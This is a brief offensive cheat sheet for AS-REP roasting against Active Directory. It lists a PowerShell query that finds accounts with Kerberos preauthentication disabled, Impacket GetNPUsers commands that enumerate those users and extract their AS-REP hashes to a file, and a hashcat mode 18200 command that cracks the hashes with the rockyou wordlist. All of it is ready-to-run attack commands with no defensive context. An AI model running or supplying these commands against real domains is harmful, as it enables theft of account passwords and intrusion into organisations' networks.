Objectives

Discovery

# PowerShell
Get-ADUser -Filter * -Properties userAccountControl | Where-Object { $_.userAccountControl -band 4194304 } | Select-Object SamAccountName

# Impacket
GetNPUsers.py domain.local/ -dc-ip 192.168.10.10 -no-pass -usersfile users.txt

Extraction & Cracking

# Impacket extraction
GetNPUsers.py domain.local/ -dc-ip 192.168.10.10 -no-pass -format hashcat -outputfile asrep.hashes

# Hashcat cracking
hashcat -m 18200 asrep.hashes rockyou.txt -O --session asrep